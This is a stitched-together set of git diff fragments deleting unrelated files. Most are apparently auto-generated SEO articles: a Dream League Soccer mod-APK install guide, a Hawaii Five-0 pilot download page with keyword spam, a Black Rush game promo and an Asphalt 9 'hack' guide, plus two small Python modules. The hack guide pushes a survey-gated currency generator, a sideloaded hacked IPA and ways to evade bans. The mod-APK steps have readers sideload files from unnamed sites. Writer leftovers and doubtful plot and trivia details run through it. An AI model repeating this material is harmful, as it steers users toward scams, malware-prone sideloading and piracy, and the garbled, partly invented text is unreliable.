    1. Go to a trusted website that provides Mod APK files for Dream League Soccer 2019. You can search on Google or use this link: [text].
    2. -
    3. Download the Mod APK file and the OBB data file from the website. The files should be in ZIP or RAR format and have a size of about 350 MB and 270 MB respectively.
    4. -
    5. Uninstall your original Dream League Soccer 2019 app from your device. You can do this by going to Settings > Apps > Dream League Soccer 2019 > Uninstall.
    6. -
    7. Enable the installation of apps from unknown sources on your device. You can do this by going to Settings > Security > Unknown Sources > Toggle On.
    8. -
    9. Extract the ZIP or RAR files using your file manager app. You should get an APK file and a folder named com.firsttouchgames.dls3.
    10. -
    11. Move the folder com.firsttouchgames.dls3 to Android > OBB on your device's internal storage or SD card.
    12. -
    13. Install the APK file by tapping on it and following the instructions on the screen.
    14. -
    15. Launch the game and enjoy Mod APK Dream League Soccer 2019 Indonesia.
    16. -
    -

    Tips for installing and using Mod APK Dream League Soccer 2019 Indonesia

    -

    To ensure a smooth and safe installation and usage of Mod APK Dream League Soccer 2019 Indonesia, here are some tips that you should follow:

    -
      -
    • Make sure that you download the files from a reputable and secure website. Avoid clicking on suspicious links or pop-ups that may contain malware or viruses.
    • -
    • Make sure that you have enough battery life on your device before installing or playing the game. You don't want your device to shut down in the middle of the process.
    • -
    • Make sure that you have a stable internet connection when playing online modes. You don't want to lose your connection or encounter lag or errors.
    • -
    • Make sure that you do not update the game from the Google Play Store or the official website. This may overwrite the Mod APK and cause it to stop working.
    • -
    • Make sure that you do not use the Mod APK to cheat or harm other players in online modes. This may result in account bans or legal actions.
    • -
    • Make sure that you have fun and enjoy the game with Mod APK Dream League Soccer 2019 Indonesia.
    • -
    -

    Conclusion

    -

    Dream League Soccer 2019 is a fantastic soccer game that lets you create and manage your own dream team and compete in various modes. However, if you want to enhance your gaming experience and unlock more features, you can try Mod APK Dream League Soccer 2019 Indonesia. This is a modified version of the original game that gives you unlimited resources, premium features, and customization options. However, you also need to be careful of the risks and challenges that come with using Mod APK. You need to follow the steps and tips that we have provided in this article to download, install, and use Mod APK Dream League Soccer 2019 Indonesia safely and smoothly. We hope that this article has helped you understand what is Mod APK, how to download it, and how to use it for Dream League Soccer 2019. If you have any questions or feedback, please feel free to leave a comment below.

    -

    FAQs

    -

    Here are some of the frequently asked questions about Mod APK Dream League Soccer 2019 Indonesia:

    -
      -
    1. What is the difference between Mod APK and OBB?
    2. -

      Mod APK is the modified version of the original app file that contains the code and logic of the game. OBB is the additional data file that contains the graphics, sounds, and other assets of the game. You need both files to run the game properly.

      -
    3. Can I use Mod APK on iOS devices?
    4. -

      No, Mod APK is only compatible with Android devices. iOS devices use a different file format and system for apps and games. You cannot install or run Mod APK on iOS devices.

      -
    5. Can I use Mod APK on PC or laptop?
    6. -

      Yes, you can use Mod APK on PC or laptop, but you need to use an Android emulator software that can simulate an Android device on your PC or laptop. Some of the popular Android emulators are BlueStacks, NoxPlayer, and LDPlayer. You need to download and install the emulator first, then follow the same steps as you would on an Android device.

      -
    7. Is Mod APK legal?
    8. -

      Mod APK is not legal in most cases, as it violates the intellectual property rights and terms and conditions of the original app developer or publisher. However, some Mod APKs are created with permission or collaboration from the original app developer or publisher, which makes them legal. You need to check the source and credibility of the Mod APK before downloading or using it.

      -
    9. Is Mod APK safe?
    10. -

      Mod APK is not safe in most cases, as it may contain malware, viruses, spyware, or other harmful software that can damage your device or steal your personal information. However, some Mod APKs are created by reputable and trustworthy developers or hackers, which makes them safe. You need to check the reviews and ratings of the Mod APK before downloading or using it.

      -

    401be4b1e0
    -
    -
    \ No newline at end of file diff --git a/spaces/fatiXbelha/sd/Download or Stream Hawaii Five-0 Pilot Episode The Birth of a Legend.md b/spaces/fatiXbelha/sd/Download or Stream Hawaii Five-0 Pilot Episode The Birth of a Legend.md deleted file mode 100644 index 0b526b6ad446d87a882a6d3dd6a3dd6462501ce0..0000000000000000000000000000000000000000 --- a/spaces/fatiXbelha/sd/Download or Stream Hawaii Five-0 Pilot Episode The Birth of a Legend.md +++ /dev/null @@ -1,176 +0,0 @@ -
    -

    Hawaii Five-0 Season 1 Episode 1: A Thrilling Start to a New Series

    -

    If you are looking for a new show to binge-watch, you might want to check out Hawaii Five-0, a modern remake of the classic police drama that ran from 1968 to 1980. The first episode of the rebooted series aired on September 20, 2010, and it was a hit with both critics and viewers. Here is everything you need to know about Hawaii Five-0 Season 1 Episode 1, from what it is about, to where you can watch it, to who are the stars behind it.

    -

    What is Hawaii Five-0?

    -

    Hawaii Five-0 is a police procedural drama that follows an elite task force that investigates crimes on the Hawaiian islands. The task force is led by Steve McGarrett (Alex O'Loughlin), a former Navy SEAL who returns to his home state after his father is murdered by a terrorist. He is joined by Danny Williams (Scott Caan), a New Jersey cop who moved to Hawaii to be closer to his daughter; Chin Ho Kelly (Daniel Dae Kim), a former Honolulu police detective who was wrongly accused of corruption; and Kono Kalakaua (Grace Park), a rookie officer and Chin's cousin. Together, they form the "Five-0", a nickname given by Governor Pat Jameson (Jean Smart), who gives them full immunity and means to fight crime.

    -

    hawaii five-0 season 1 episode 1 download


    Download Zip ✏ ✏ ✏ https://urllie.com/2uNBQV



    -

    What happens in the pilot episode?

    -

    The pilot episode begins with Steve McGarrett arriving in Hawaii to attend his father's funeral. He is greeted by Danny Williams, who informs him that his father was killed by Victor Hesse (James Marsters), a notorious arms dealer who was seeking revenge for Steve's role in killing his brother Anton (Norman Reedus). Steve vows to find Hesse and bring him to justice, but he is interrupted by Governor Jameson, who offers him a job as the head of a new task force that will have no red tape or bureaucracy. Steve initially declines, but he changes his mind when he learns that Danny is assigned to investigate his father's murder.

    -

    Steve recruits Chin Ho Kelly, an old friend of his father who was forced to resign from the HPD after being framed for stealing money from an evidence locker. Chin suggests that they also hire Kono Kalakaua, his cousin who just graduated from the police academy. Together, they track down Hesse's location using clues left by Steve's father in a toolbox. They find Hesse holding a hostage, who turns out to be Steve's sister Mary Ann (Taryn Manning). Steve manages to rescue Mary Ann and shoot Hesse, but not before Hesse reveals that he was working for someone else, a mysterious figure known as Wo Fat (Mark Dacascos).

    -

    The episode ends with Steve accepting Governor Jameson's offer and naming his team "Five-0", after his father's old police badge number. He also tells Danny to "book 'em, Danno", a catchphrase that was used by the original Hawaii Five-O characters.

    -

    Why should you watch Hawaii Five-0 Season 1 Episode 1?

    -

    There are many reasons why you should watch Hawaii Five-0 Season 1 Episode 1, whether you are a fan of the original series or not. Here are some of them:

    -
      -
    • The pilot episode is packed with action and suspense, from car chases to shootouts to explosions. You will be on the edge of your seat as you watch the Five-0 team take on Hesse and his henchmen.
    • -
    • The pilot episode showcases the beautiful scenery and culture of Hawaii, from the stunning beaches to the lush mountains to the vibrant city. You will feel like you are on a tropical vacation as you watch the Five-0 team explore the island.
    • -
    • The pilot episode introduces the main characters and their personalities, as well as their chemistry and banter. You will get to know and love Steve, Danny, Chin, and Kono, as well as their strengths and weaknesses, their backgrounds and motivations, and their relationships and conflicts.
    • -
    • The pilot episode sets up the main arc and mystery of the series, which is the identity and agenda of Wo Fat, the elusive mastermind behind Hesse's actions. You will be intrigued and curious as you watch the Five-0 team uncover clues and face dangers related to Wo Fat.
    • -
    • The pilot episode ends with a cliffhanger that will make you want to watch more. You will be hooked and eager to find out what happens next, as well as how the Five-0 team will evolve and grow throughout the series.
    • -
    -

    Where can you watch Hawaii Five-0 Season 1 Episode 1?

    -

    If you are interested in watching Hawaii Five-0 Season 1 Episode 1, you have several options to choose from. Here are some of them:

    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    Who are the cast and crew of Hawaii Five-0 Season 1 Episode 1?

    -

    Hawaii Five-0 Season 1 Episode 1 features a talented and diverse cast and crew who bring the story and the characters to life. Here is a table with the names and roles of some of the actors and directors who worked on the episode:

    -

    hawaii five-o 1968 full fathom five download
    -hawaii five-0 strangers in our own land free download
    -hawaii five-o tiger by the tail streaming online
    -hawaii five-0 samurai episode 1 download
    -hawaii five-o and they painted daisies on his coffin free streaming
    -hawaii 5-o twenty four carat kill download
    -hawaii five-0 the ways of love episode 1 streaming
    -hawaii 5-o no blue skies free download
    -hawaii five-o by the numbers episode 1 download
    -hawaii 5-o yesterday died and tomorrow won't be born streaming
    -hawaii five-o deathwatch free download
    -hawaii 5-o pray love remember episode 1 download
    -hawaii five-o king of the hill streaming online
    -hawaii 5-o up tight free download
    -hawaii five-o face of the dragon episode 1 download
    -hawaii 5-o the box streaming online
    -hawaii five-o one for the money free download
    -hawaii five-o along came joey episode 1 download
    -hawaii 5-o once upon a time part 1 streaming online
    -hawaii five-o once upon a time part 2 free download
    -hawaii 5-o not that much different episode 1 download
    -hawaii five-o six kilos streaming online
    -hawaii 5-o the big kahuna free download
    -hawaii five-o cocoon part 1 episode 1 download
    -hawaii five-o cocoon part 2 streaming online
    -watch hawaii five-0 pilot episode online free
    -stream hawaii five-0 ohana episode online hd
    -download hawaii five-0 malama ka aina episode hd
    -watch hawaii five-0 lanakila episode online free
    -stream hawaii five-0 nalowale episode online hd
    -download hawaii five-0 ko'olauloa episode hd
    -watch hawaii five-0 ho'apono episode online free
    -stream hawaii five-0 mana'o episode online hd
    -download hawaii five-0 po'ipu episode hd
    -watch hawaii five-0 heihei episode online free
    -stream hawaii five-0 palekaiko episode online hd
    -download hawaii five-0 hahaione episode hd
    -watch hawaii five-0 ke kinohi episode online free
    -stream hawaii five-0 e malama episode online hd
    -download hawaii five-0 powa maka moana episode hd
    -watch hawaii five-0 loa aloha episode online free
    -stream hawaii five-0 nei'e nei'e episode online hd
    -download hawaii five-0 e ho'i na keiki oki uaua o na pali episode hd

    -
    PlatformAvailabilityPrice
    CBS All AccessAll seasons and episodes$5.99/month with ads or $9.99/month without ads
    NetflixSeasons 1 to 8$8.99/month for basic plan or $13.99/month for standard plan or $17.99/month for premium plan
    Amazon Prime VideoAll seasons and episodes$2.99/episode or $19.99/season or free with CBS All Access add-on
    HuluAll seasons and episodes$5.99/month with ads or $11.99/month without ads or free with CBS All Access add-on
    iTunesAll seasons and episodes$2.99/episode or $19.99/season
    VuduAll seasons and episodes$1.99/episode or $14.99/season
    YouTubeAll seasons and episodes$1.99/episode or $14.99/season
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    What are some trivia and fun facts about Hawaii Five-0 Season 1 Episode 1?

    -

    Hawaii Five-0 Season 1 Episode 1 is not only an entertaining and exciting watch, but also a fascinating and informative one. Here are some trivia and fun facts that you might not know about the episode:

    -
      -
    • The pilot episode was filmed in Oahu, Hawaii, in March 2010. It took 15 days to shoot and cost $8 million to produce.
    • -
    • The pilot episode features a cameo appearance by Al Harrington, who played Detective Ben Kokua in the original Hawaii Five-O series. He plays Mamo Kahike, a friend of Steve's father who runs a surf shop.
    • -
    • The pilot episode pays homage to the original Hawaii Five-O series in several ways, such as using the same theme song, opening credits, catchphrase, and locations. For example, the Iolani Palace, which served as the headquarters of the Five-O team in the original series, is also used as the Governor's office in the rebooted series.
    • -
    • The pilot episode was dedicated to the memory of Leonard Freeman, the creator of the original Hawaii Five-O series, who died in 1974. His name appears on Steve's father's tombstone in the opening scene.
    • -
    • The pilot episode received positive reviews from critics and audiences alike. It scored a 7.6/10 rating on IMDb, a 74% approval rating on Rotten Tomatoes, and a 66/100 score on Metacritic. It also attracted 14.2 million viewers on its premiere night, making it the most-watched new show of the fall season.
    • -

      Conclusion

      -

      Hawaii Five-0 Season 1 Episode 1 is a thrilling start to a new series that combines action, drama, humor, and romance. It introduces the main characters and their mission, as well as the main villain and his plot. It also showcases the beauty and culture of Hawaii, as well as the legacy and influence of the original Hawaii Five-O series. If you are looking for a new show to watch, you should definitely give Hawaii Five-0 Season 1 Episode 1 a try. You will not regret it.

      -

      FAQs

      -

      Here are some frequently asked questions and answers about Hawaii Five-0 Season 1 Episode 1:

      -
        -
      1. Is Hawaii Five-0 based on a true story?
      2. -

        No, Hawaii Five-0 is not based on a true story. It is a fictional show that follows an elite task force that investigates crimes on the Hawaiian islands. However, some of the cases and characters are inspired by real-life events and people.

        -
      3. How many seasons and episodes are there in Hawaii Five-0?
      4. -

        Hawaii Five-0 ran for 10 seasons and 240 episodes from 2010 to 2020. The final episode aired on April 3, 2020. The show was cancelled due to the departure of Alex O'Loughlin, who played Steve McGarrett.

        -
      5. What is the meaning of the title Hawaii Five-0?
      6. -

        The title Hawaii Five-0 has two meanings. One is that it refers to the name of the task force that investigates crimes on the Hawaiian islands. The other is that it is a pun on the name of the state of Hawaii, which is the 50th state to join the United States of America.

        -
      7. What is the difference between Hawaii Five-0 and Hawaii Five-O?
      8. -

        The difference between Hawaii Five-0 and Hawaii Five-O is that the former is the name of the rebooted series that started in 2010, while the latter is the name of the original series that ran from 1968 to 1980. The rebooted series uses a zero instead of a letter O in its title to distinguish itself from the original series.

        -
      9. Who sings the theme song of Hawaii Five-0?
      10. -

        The theme song of Hawaii Five-0 is a re-recorded version of the original Hawaii Five-O theme song, which was composed by Morton Stevens and performed by The Ventures. The re-recorded version was performed by Brian Tyler and Keith Power, who also composed the original music for the rebooted series.

        I have completed writing the article. I hope you enjoyed reading it and found it helpful. Here is the custom message that you asked for:

        197e85843d
        -
        -
        \ No newline at end of file diff --git a/spaces/feng2022/Time-TravelRephotography/Time_TravelRephotography/models/encoder4editing/__init__.py b/spaces/feng2022/Time-TravelRephotography/Time_TravelRephotography/models/encoder4editing/__init__.py deleted file mode 100644 index 1b04c7e94fd5e2dfaa580174b37356f19ce1a5e1..0000000000000000000000000000000000000000 --- a/spaces/feng2022/Time-TravelRephotography/Time_TravelRephotography/models/encoder4editing/__init__.py +++ /dev/null @@ -1,15 +0,0 @@ -from .utils.model_utils import setup_model - - -def get_latents(net, x, is_cars=False): - codes = net.encoder(x) - if net.opts.start_from_latent_avg: - if codes.ndim == 2: - codes = codes + net.latent_avg.repeat(codes.shape[0], 1, 1)[:, 0, :] - else: - codes = codes + net.latent_avg.repeat(codes.shape[0], 1, 1) - if codes.shape[1] == 18 and is_cars: - codes = codes[:, :16, :] - return codes - - diff --git a/spaces/feng2022/Time-TravelRephotography/Time_TravelRephotography/models/gaussian_smoothing.py b/spaces/feng2022/Time-TravelRephotography/Time_TravelRephotography/models/gaussian_smoothing.py deleted file mode 100644 index f7803dad0d8c34bc93fc9e80b3b9fea200bf0c78..0000000000000000000000000000000000000000 --- a/spaces/feng2022/Time-TravelRephotography/Time_TravelRephotography/models/gaussian_smoothing.py +++ /dev/null @@ -1,74 +0,0 @@ -import math -import numbers -import torch -from torch import nn -from torch.nn import functional as F - - -class GaussianSmoothing(nn.Module): - """ - Apply gaussian smoothing on a - 1d, 2d or 3d tensor. Filtering is performed seperately for each channel - in the input using a depthwise convolution. - Arguments: - channels (int, sequence): Number of channels of the input tensors. Output will - have this number of channels as well. - kernel_size (int, sequence): Size of the gaussian kernel. - sigma (float, sequence): Standard deviation of the gaussian kernel. - dim (int, optional): The number of dimensions of the data. - Default value is 2 (spatial). - """ - def __init__(self, channels, kernel_size, sigma, dim=2): - super(GaussianSmoothing, self).__init__() - if isinstance(kernel_size, numbers.Number): - kernel_size = [kernel_size] * dim - if isinstance(sigma, numbers.Number): - sigma = [sigma] * dim - - # The gaussian kernel is the product of the - # gaussian function of each dimension. - kernel = 1 - meshgrids = torch.meshgrid( - [ - torch.arange(size, dtype=torch.float32) - for size in kernel_size - ] - ) - for size, std, mgrid in zip(kernel_size, sigma, meshgrids): - mean = (size - 1) / 2 - kernel *= 1 / (std * math.sqrt(2 * math.pi)) * \ - torch.exp(-((mgrid - mean) / (2 * std)) ** 2) - - # Make sure sum of values in gaussian kernel equals 1. - kernel = kernel / torch.sum(kernel) - - # Reshape to depthwise convolutional weight - kernel = kernel.view(1, 1, *kernel.size()) - kernel = kernel.repeat(channels, *[1] * (kernel.dim() - 1)) - - self.register_buffer('weight', kernel) - self.groups = channels - - if dim == 1: - self.conv = F.conv1d - elif dim == 2: - self.conv = F.conv2d - elif dim == 3: - self.conv = F.conv3d - else: - raise RuntimeError( - 'Only 1, 2 and 3 dimensions are supported. Received {}.'.format(dim) - ) - - def forward(self, input, stride: int = 1): - """ - Apply gaussian filter to input. - Arguments: - input (torch.Tensor): Input to apply gaussian filter on. - stride for applying conv - Returns: - filtered (torch.Tensor): Filtered output. - """ - padding = (self.weight.shape[-1] - 1) // 2 - return self.conv(input, weight=self.weight, groups=self.groups, padding=padding, stride=stride) - diff --git a/spaces/feregVcuzo/sanity-test-midi/checkpoint/ .md b/spaces/feregVcuzo/sanity-test-midi/checkpoint/ .md deleted file mode 100644 index a8403b27655eaa8b19b91003709581c554a296b8..0000000000000000000000000000000000000000 --- a/spaces/feregVcuzo/sanity-test-midi/checkpoint/ .md +++ /dev/null @@ -1,52 +0,0 @@ -
        -

        Download Black Rush: A Mobile Online Game About The Criminal World Of Russia

        -

        Do you love action-packed games that let you experience the thrill and danger of living in a criminal world? Do you want to drive fast cars, fight with rival gangs, earn money from illegal jobs, and explore a realistic and dynamic environment? If you answered yes to any of these questions, then you should download Black Rush - a mobile online game that is based on the criminal world of Russia.

        -

        скачать блек раша


        Download File ☆☆☆☆☆ https://gohhs.com/2uPvke



        -

        What Is Black Rush?

        -

        Black Rush is an online game that was developed by Black Russia Studio and released in 2020. The game is inspired by the popular CRMP

        (CRMP) games, which are multiplayer modifications of GTA: San Andreas that recreate the atmosphere of Russia in the 90s. The game features realistic graphics and sound effects, dynamic and immersive environment, social and competitive features, and more. You can choose your car, character, job, and gang, and start your own criminal career in the game. You can also interact with other players, join voice and text chat, participate in events, and collect magnetite for extra rewards. The game is available on VKontakte, a popular social media platform in Russia that has over 500 million users. You can download the game for free from the official VK page of Black Russia Studio, or from the Google Play Store. The game is compatible with Android devices and has a rating of 4.5 out of 5 stars based on over 13,000 reviews.

        -

        How To Download Black Rush?

        -

        Downloading Black Rush is easy and fast. You can choose one of the following methods to download the game:

        -
          -
        • Download from VKontakte: If you have a VK account, you can go to the official VK page of Black Russia Studio and click on the "Play" button. This will open the game in your browser or in the VK app if you have it installed. You can also scan the QR code on the page with your phone camera to open the game directly.
        • -
        • Download from Google Play Store: If you prefer to download the game from the Google Play Store, you can search for "Black Rush" or use this link: [text](^10^). This will take you to the game page where you can click on the "Install" button to download and install the game on your device.
        • -
        -

        After downloading the game, you can launch it from your device's home screen or app drawer. You will need to create an account or log in with your VK account to start playing. You can also customize your settings, such as language, graphics, sound, and sensitivity, from the game menu.

        -

        How To Play Black Rush?

        -

        Playing Black Rush is fun and exciting. You can explore and interact with the realistic and dynamic environment of Russia in the 90s, drive hundreds of unique cars, fight with rival gangs, earn money from illegal jobs, and more. Here are some of the things you can do in the game:

        -

        Choose Your Car

        -

        The game offers a wide range of cars to choose from, both domestic and foreign. You can find cars from brands such as Lada, Volga, Moskvich, UAZ, VAZ, BMW, Mercedes-Benz, Audi, Toyota, Nissan, and more. You can also customize your car with different parts, such as wheels, spoilers, bumpers, neon lights, vinyls, and more. You can buy new cars or upgrade your existing ones with money that you earn in the game.

        -

        Choose Your Character

        -

        The game also offers a variety of characters to choose from, each with their own appearance and personality. You can find characters such as gangsters, cops, businessmen, students, workers, celebrities, and more. You can also customize your character with different clothes, accessories, tattoos, hairstyles, and more. You can buy new clothes or change your appearance with money that you earn in the game.

        -

        Choose Your Job

        -

        The game also offers a variety of jobs to choose from, each with their own rewards and risks. You can find jobs such as taxi driver, courier, mechanic, hacker, dealer, robber, hitman, and more. You can also create your own jobs or accept jobs from other players. You can earn money or items from completing jobs in the game.

        -

        Choose Your Gang

        -

        The game also offers a variety of gangs to choose from or join, each with their own territory and reputation. You can find gangs such as Bratva (Russian Mafia), OMON (Special Police Force), Bandits (Street Thugs), Rappers (Hip Hop Artists), Bikers (Motorcycle Riders), Skinheads (Neo-Nazis), and more. You can also create your own gang or join a gang created by other players. You can fight with rival gangs or cooperate with allied gangs in the game.

        -

        Why Play Black Rush?

        -

        There are many reasons why you should play Black Rush. Here are some of them:

        -

        -

        Realistic Graphics And Sound Effects

        -

        The game has realistic graphics and sound effects that create a sense of immersion and realism. The game uses high-quality models and textures for cars and buildings that reflect the style and culture of Russia in the 90s. The game also uses realistic sound effects for cars and weapons that match the real ones. The game also has a dynamic weather system and day and night cycle that affect the visibility and atmosphere of the game.

        -

        Dynamic And Immersive Environment

        -

        The game has a dynamic and immersive environment that allows you to explore and interact with various elements. The game has a large map that covers different regions of Russia, such as Moscow, St. Petersburg, Siberia, Chechnya, and more. The game also has different types of buildings, such as apartments, offices, shops, clubs, warehouses, factories, and more. The game also has different types of objects, such as traffic lights, vending machines, ATMs, phones, radios, TVs, and more. The game also has different types of NPCs, such as pedestrians, drivers, cops, gangsters, animals, and more. The game also has different types of events, such as car chases, shootouts, robberies, races, concerts, and more.

        -

        Social And Competitive Features

        -

        The game has social and competitive features that allow you to communicate and compete with other players. The game has a voice and text chat system that lets you talk to other players in real time. The game also has a friend and enemy system that lets you add or block other players. The game also has a ranking and reputation system that lets you see your progress and status in the game. The game also has a clan and alliance system that lets you join or create groups of players with common goals and interests. The game also has a PvP and PvE system that lets you fight or cooperate with other players in different modes and scenarios.

        -

        Tips And Tricks For Playing Black Rush

        -

        If you want to play Black Rush better and have more fun, here are some tips and tricks that you can use:

        -

        Use Headphones For Better Immersion

        -

        If you want to have a better immersion and sound quality, you should use headphones when playing Black Rush. This will help you hear the sound effects more clearly and feel the atmosphere more intensely. You will also be able to hear the voice chat more easily and communicate with other players more effectively.

        -

        Adjust Your Sensitivity Settings For Better Control

        -

        If you want to have a better control over your car and character, you should adjust your sensitivity settings in the game menu. This will help you steer your car more smoothly and aim your weapon more accurately. You can also customize your controls for different actions, such as driving, shooting, jumping, crouching, and more.

        -

        Collect Magnetite For Extra Rewards

        -

        If you want to have extra rewards such as money and items, you should collect magnetite in the game. Magnetite is a rare mineral that can be found in various places in the game world. You can use a magnetometer to detect magnetite nearby and collect it with a magnetizer. You can then exchange magnetite for money or items at special shops or terminals in the game.

        -

        Conclusion

        -

        Black Rush is a mobile online game that is based on the criminal world of Russia. It is a fun and exciting game that lets you experience the thrill and danger of living in a criminal world. You can download the game for free from VKontakte or Google Play Store and start playing right away. You can choose your car, character, job, and gang, and start your own criminal career in the game. You can also explore and interact with the realistic and dynamic environment of Russia in the 90s, drive hundreds of unique cars, fight with rival gangs, earn money from illegal jobs, and more. You can also communicate and compete with other players, join or create clans and alliances, participate in events, and collect magnetite for extra rewards. If you love action-packed games that let you experience the thrill and danger of living in a criminal world, then you should download Black Rush today and join the millions of players who are already enjoying the game.

        -

        Here are some FAQs about Black Rush:

        -
          -
        • Q: Is Black Rush free to play? A: Yes, Black Rush is free to play. You can download the game for free from VKontakte or Google Play Store. You can also play the game without spending any real money. However, you can buy optional items or services with real money if you want to enhance your gameplay experience.
        • -
        • Q: Is Black Rush safe to play? A: Yes, Black Rush is safe to play. The game does not contain any viruses or malware that can harm your device or data. The game also does not require any personal information or permissions that can compromise your privacy or security. However, you should be careful when playing online with other players, as some of them may use inappropriate language or behavior. You can report or block any players who violate the game rules or terms of service.
        • -
        • Q: Is Black Rush available in other languages? A: Yes, Black Rush is available in other languages. The game supports Russian, English, and Turkish languages. You can change the language of the game from the game menu. However, some of the content or features of the game may not be fully translated or localized in some languages.
        • -
        • Q: Is Black Rush compatible with my device? A: Black Rush is compatible with most Android devices that have at least 2 GB of RAM and Android 4.4 or higher. However, some devices may not be able to run the game smoothly or properly due to different specifications or performance issues. You can check the compatibility of your device from the game page on VKontakte or Google Play Store.
        • -
        • Q: How can I contact the developers of Black Rush? A: You can contact the developers of Black Rush by using the feedback form on the official VK page of Black Russia Studio. You can also follow the page for the latest news and updates about the game. You can also join the official VK group of Black Rush, where you can chat with other players and developers, share your feedback and suggestions, participate in polls and contests, and more.
        • -

        197e85843d
        -
        -
        \ No newline at end of file diff --git a/spaces/feregVcuzo/sanity-test-midi/checkpoint/Asphalt 9 Legends Hack - How to Get Unlimited Tokens and Credits on iOS Devices.md b/spaces/feregVcuzo/sanity-test-midi/checkpoint/Asphalt 9 Legends Hack - How to Get Unlimited Tokens and Credits on iOS Devices.md deleted file mode 100644 index b2ebc6bcb9a90f86f5e21fe523386dd486846779..0000000000000000000000000000000000000000 --- a/spaces/feregVcuzo/sanity-test-midi/checkpoint/Asphalt 9 Legends Hack - How to Get Unlimited Tokens and Credits on iOS Devices.md +++ /dev/null @@ -1,102 +0,0 @@ -
        - -
    ActorRole
    Alex O'LoughlinSteve McGarrett
    Scott CaanDanny Williams
    Daniel Dae KimChin Ho Kelly
    Grace ParkKono Kalakaua
    Jean SmartPat Jameson
    James MarstersVictor Hesse
    Taryn ManningMary Ann McGarrett
    Mark DacascosWo Fat
    DirectorCredit
    Len WisemanDirected the pilot episode
    - - - -
    -

    Asphalt 9 Legends Hack: How to Download and Use It on iOS

    -

    Introduction

    -

    Asphalt 9 Legends is one of the most popular racing games on mobile devices. It offers stunning graphics, realistic physics, and thrilling gameplay. You can choose from more than 100 cars from famous brands like Ferrari, Lamborghini, Porsche, and more. You can also customize your cars and upgrade them to suit your style and preferences. You can race in different modes and locations, such as career mode, multiplayer mode, events mode, and exotic places like Cairo, Shanghai, Rome, and more.

    -

    However, Asphalt 9 Legends is not an easy game to master. You need to have a lot of skills, patience, and resources to progress in the game. You need to earn tokens and credits, which are the main currencies of the game, to buy new cars, upgrade them, and unlock new features. You also need to compete with other players from around the world, who may have better cars and skills than you. You may find yourself stuck in a certain level or mode, or frustrated by the difficulty of the game.

    -

    asphalt 9 legends hack download ios


    Downloadhttps://gohhs.com/2uPtyi



    -

    That's why many players are looking for a way to hack Asphalt 9 Legends and get unlimited tokens and credits. By using a hack for Asphalt 9 Legends, you can enjoy the game without any limitations or restrictions. You can buy any car you want, upgrade it to the max level, and dominate the races. You can also unlock all the features and modes of the game, and have more fun and excitement. You can also save your time and money, as you don't need to spend hours grinding or spend real cash to buy tokens and credits.

    -

    So, how can you hack Asphalt 9 Legends on iOS? What are the features of Asphalt 9 Legends hack? And how can you use it safely and effectively? In this article, we will answer all these questions and more. We will show you two methods to download and use Asphalt 9 Legends hack on iOS devices. We will also give you some tips and tricks for using the hack. So, let's get started!

    -

    How to Download Asphalt 9 Legends Hack on iOS

    -

    There are two methods to download Asphalt 9 Legends hack on iOS devices. The first method is using NovaGames website, which is an online generator that can give you unlimited tokens and credits for free. The second method is using Archive.org website, which is a web archive that can provide you with a hacked IPA file that you can install on your device using Cydia Impactor or AltStore. We will explain both methods in detail below.

    -

    Method 1: Using NovaGames Website

    -

    NovaGames website is one of the best sources for Asphalt 9 Legends hack on iOS devices. It is an online generator that can give you unlimited tokens and credits for free. You don't need to download anything or jailbreak your device to use it. All you need is a stable internet connection and a few minutes of your time. Here are the steps to use NovaGames website:

    -
      -
    1. Go to NovaGames website using your device's browser.
    2. -
    3. Enter your Asphalt 9 Legends username or email in the required field.
    4. -
    5. Select your device platform (iOS) and region (US).
    6. -
    7. Choose the amount of tokens and credits you want to generate (up to 999999).
    8. -
    9. Click on the "Generate Now" button and wait for the process to complete.
    10. -
    11. You may need to verify your device by completing a short survey or offer. This is to prevent bots and abuse of the service.
    12. -
    13. Once you complete the verification, you will receive your tokens and credits in your game account within a few minutes.
    14. -
    15. Enjoy the game with unlimited resources!
    16. -
    -

    Method 2: Using Archive.org Website

    -

    Archive.org website is another source for Asphalt 9 Legends hack on iOS devices. It is a web archive that can provide you with a hacked IPA file that you can install on your device using Cydia Impactor or AltStore. You need to jailbreak your device or use a sideloading app to use this method. Here are the steps to use Archive.org website:

    -
      -
    1. Go to Archive.org website using your device's browser.
    2. -
    3. Search for "Asphalt 9 Legends Hack IPA" in the search bar.
    4. -
    5. Select the latest version of the hacked IPA file from the results.
    6. -
    7. Download the hacked IPA file to your device.
    8. -
    9. Install the hacked IPA file using Cydia Impactor or AltStore.
    10. -
    11. Cydia Impactor is a tool that can install IPA files on iOS devices using a computer. You need to have iTunes installed on your computer and connect your device with a USB cable. You also need to enter your Apple ID and password when prompted by Cydia Impactor.
    12. -
    13. AltStore is an app that can install IPA files on iOS devices without a computer. You need to download AltStore app from its official website and install it on your device. You also need to trust the app in your device settings and refresh it every 7 days.
    14. -
    15. Launch the game with the hack enabled. You will see a menu with various options to modify the game, such as unlimited tokens, credits, nitro, speed, and more.
    16. -
    17. Enjoy the game with the hack!
    18. -
    -

    How to Use Asphalt 9 Legends Hack on iOS

    -

    Now that you have downloaded and installed Asphalt 9 Legends hack on your iOS device, you may wonder how to use it effectively and safely. Here are some tips and tricks for using the hack:

    -

    Tips and Tricks for Using the Hack

    -
      -
    • Customize your cars and unlock new ones with the hack. You can use the unlimited tokens and credits to buy any car you want, from the common ones to the legendary ones. You can also upgrade your cars to the max level and enhance their performance and appearance. You can also unlock new cars by completing certain achievements or events with the hack.
    • -
    • Compete in multiplayer mode and win races with the hack. You can use the hack to boost your speed, nitro, and acceleration in multiplayer mode. You can also disable traffic, collisions, and cops to make your races easier. You can also choose any track and mode you want with the hack. You can win more races and climb up the leaderboard with the hack.
    • -
    • Avoid getting banned by Gameloft with the hack. Gameloft is the developer of Asphalt 9 Legends, and they may detect and ban players who use hacks or cheats in their game. To avoid getting banned, you should use the hack sparingly and wisely. Don't use it too often or too blatantly. Don't generate too many tokens and credits at once. Don't win every race by a large margin. Don't brag about using the hack in chat or social media. Be smart and discreet when using the hack.
    • -
    -

    Conclusion

    -

    Asphalt 9 Legends is a fun and exciting racing game that you can enjoy on your iOS device. However, it can also be challenging and frustrating at times, especially if you don't have enough resources or skills to progress in the game. That's why using a hack for Asphalt 9 Legends can be a great solution for you. You can get unlimited tokens and credits for free, and use them to buy, upgrade, and unlock new cars. You can also modify the game settings and features to make your races easier and more enjoyable. You can also compete in multiplayer mode and win more races with the hack.

    -

